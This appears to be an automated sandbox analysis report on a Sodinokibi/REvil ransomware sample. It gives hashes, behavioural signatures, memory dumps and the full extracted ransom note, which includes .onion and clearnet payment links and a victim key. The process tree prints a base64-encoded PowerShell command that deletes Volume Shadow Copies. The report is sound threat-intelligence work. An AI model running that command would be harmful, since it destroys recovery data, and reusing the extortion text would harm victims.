Analysis

  • max time kernel
    130s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:48

General

  • Target

    e5ef61799ae020e426b7e2a4763c053323d2ca12a5d1bd5ed5984e134446eba7.exe

  • Size

    155KB

  • MD5

    f16a096605b961e772d995b0b6a18782

  • SHA1

    5c099616f70b8e9d011b1289abdd2058df420a46

  • SHA256

    e5ef61799ae020e426b7e2a4763c053323d2ca12a5d1bd5ed5984e134446eba7

  • SHA512

    8f9d2c70c44a438dd3b6437105e6f3624c1c2fc30961289098afd0f6401e8058d94d4bb57d8ea009662b18a4776498415e9102bbb1555a44f600a85389cc2a42

Malware Config

Extracted

Path

C:\8nqdcu4yj-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 8nqdcu4yj. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A0AC4BAAF43CF99D 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A0AC4BAAF43CF99D Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: xgh/0IckjTFLCHppbNM5TX9MjT/S91bIpZWcXUZatobLsGMItZhA4WiEYJRZGjTV 3jauQ/Ck1oxuO2TyeKJe6M6mxjcxSEwqnO9M4oaMDGNMPXkD3gj9c/DXbHJHtLc/ va9IFpFWeyj5q08FMW+nWZgek5YVEuP9ZToGpvW7NvQXFGOl1iGx96ROTj1Cdx4Q 71c5h9/O+u5wNJVBws1skfJFIo2xCXjaSSvKp69mMOzpSmNJ76B7UgzrsRcgRBJb b/8i8Qgs/RO1W/mfOx2xzoE2KeR9j9MQNLRB7JvP7QVe1yCOgP/0NIH3u0/3pPoC aliDLzIiIXuo67lNEqwlCqE9plHkKJv148afIRDU0v5swh+bk+vCszcEkK7suaF9 NrVKKeVsQ7lbjV5I29nniles1oS2zxRyWvHYOwZf2UWt6mQeoBFZU1lwu94zpnJm dzVKl7E/rsw54Fx1vkl8zG60IUHf3X+I5QbSvF1xWVKDO0fEEWDAaKslQFJnOABU kiJB7GyDEnoHWfB0WDZh4mso9ueEAWPToarvt083Ejl1C4mHE7VElqbutMR3d051 9CV2Q4YJIvCyy5LljkXZpsP4o980HFKl0Ubm4bGr9WYB62OjDnfBkP8Ta9C6N6SX QfEIe0Esi92AnXzr2hftKu3h71hcqQc3eC2YadqjWNf+XjkCVmzChjI+sZfC9f3P EW4VAa69hlMprj8CYIXAFzrUQh70eo7cmjWkAS/Snl5EBJmleALWbqkmHHT31lKT LVpEhmfxIjJdKURvIWYS9dU+kNZVcGDnUzu2FGju1298QQdTGsjWdyJ7UvnVxF15 jpamcJLd24j3yHSOC820KXf73kM7f1z0Q9V4SeMMNV3QnLGSCQA+V8Q5/y/b0dss hluNYCabLx0y+uP1kevbrF3rXs48pXV7HL9iF6UQb3A1uE7tcT+Jnn8wMmQflUw1 Zg7PlKeAmPrfOPesju6l85a1BgJLCdY9TByLa8zYeMFD86N+2uHruJynoinJJKrL fPzwcWfBQs9SI5bbi74wD9OIvaN7FDuA6rY8ZyV507vuZeLNgTxwY1nu9k4+a2Gu GtDolDPWuLBjGeKE8KzSsT/nPvBYC6lasTnyNPO8W4k6dSAs/d+71T0WxY4gKwNo oEuY2B/bEwy6vFBWDhxu6u2AdJ4BuwiMEdgTAihlAstvE1FxMTA8scQeFyxRxwUh Y8eyMsn/AQpcN3rbT1sr6AzGW80KyKH+VWC8PvK3Z2hregLt3bSyZP67ivyoR1ID cqS9OA/BZmXpLp4Fnif2fPbNrcphuSNWQmFUFwqS Extension name: 8nqdcu4yj ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A0AC4BAAF43CF99D

http://decryptor.cc/A0AC4BAAF43CF99D

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 16 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e5ef61799ae020e426b7e2a4763c053323d2ca12a5d1bd5ed5984e134446eba7.exe
    "C:\Users\Admin\AppData\Local\Temp\e5ef61799ae020e426b7e2a4763c053323d2ca12a5d1bd5ed5984e134446eba7.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:760
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1864
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1812

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/760-55-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp
      Filesize

      8KB

    • memory/760-57-0x0000000002490000-0x0000000002492000-memory.dmp
      Filesize

      8KB

    • memory/760-58-0x0000000002492000-0x0000000002494000-memory.dmp
      Filesize

      8KB

    • memory/760-59-0x0000000002494000-0x0000000002497000-memory.dmp
      Filesize

      12KB

    • memory/760-56-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
      Filesize

      11.4MB

    • memory/760-60-0x000000000249B000-0x00000000024BA000-memory.dmp
      Filesize

      124KB

    • memory/1588-54-0x0000000076151000-0x0000000076153000-memory.dmp
      Filesize

      8KB